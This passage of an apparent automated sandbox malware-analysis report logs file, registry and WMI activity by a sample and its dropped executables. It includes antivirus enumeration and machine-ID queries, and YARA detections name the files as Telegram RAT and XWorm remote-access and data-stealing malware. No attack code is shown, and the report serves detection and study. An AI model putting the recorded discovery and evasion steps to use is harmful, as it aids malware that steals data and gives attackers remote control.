Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Systen User	Queries volume information: C:\Users\user\AppData\Roaming\Systen User VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: adawsfaefasfasfg.exe, 00000002.00000002.2638986605.000000001BF9A000.00000004.00000020.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2631919617.000000001BF20000.00000004.00000020.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2628664918.000000001BF02000.00000004.00000020.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2650967310.000000001CC30000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2675303572.000000001BE47000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2575156399.0000000001231000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2675303572.000000001BE52000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\adawsfaefasfasfg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\wasdwasfwasfs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
